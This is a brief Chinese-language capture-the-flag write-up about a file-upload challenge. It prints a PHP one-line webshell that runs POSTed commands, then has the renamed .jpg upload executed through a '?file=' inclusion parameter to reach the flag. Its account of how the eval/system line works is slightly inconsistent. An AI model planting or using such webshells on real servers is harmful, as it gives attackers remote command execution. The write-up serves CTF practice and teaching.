知識點
一句話
審題
就不審了 就是個上傳
解題
一句話木馬肯定很多人都知道 但是肯定有一部分人還停留在只會把馬傳上去然后菜刀連接的階段(暗示自己 回到題目 題目沒有設置上傳后綴的限制 但是上傳之后任意后綴形式都會被改成.jpg格式 也就是說 如果只是單純的上傳了馬 那么被以jpg格式儲存之后 用菜刀是連不上的
下面稍微講一下這個一句話
<?php @eval(system($_POST["x"]));?>
當這條語句被服務端執行了,我們同時利用 POST 請求上傳變量 x 的值,例如 x=echo 'Hello'
php 解析器執行的實質上是 @eval("echo 'Hello'"),即在前端輸出一個字符串
更常見的利用手法是利用 @eval(system($_POST["x"])) 直接控制服務端的 shell
我們上傳之后 不能直接訪問xxx/uploads/xxxxx.jpg 那樣只是預覽這個文件 而起不到調用這個文件的作用 當然我記得如果是個php后綴的馬好像就直接預覽就行了
http://331c5aef-7929-44fa-b2c1-cef10026df1e.node3.buuoj.cn/?file=uploads/5fc7887283d67.jpg
這樣之后 打開postman慢慢找就可以了
最后找到flag
EOF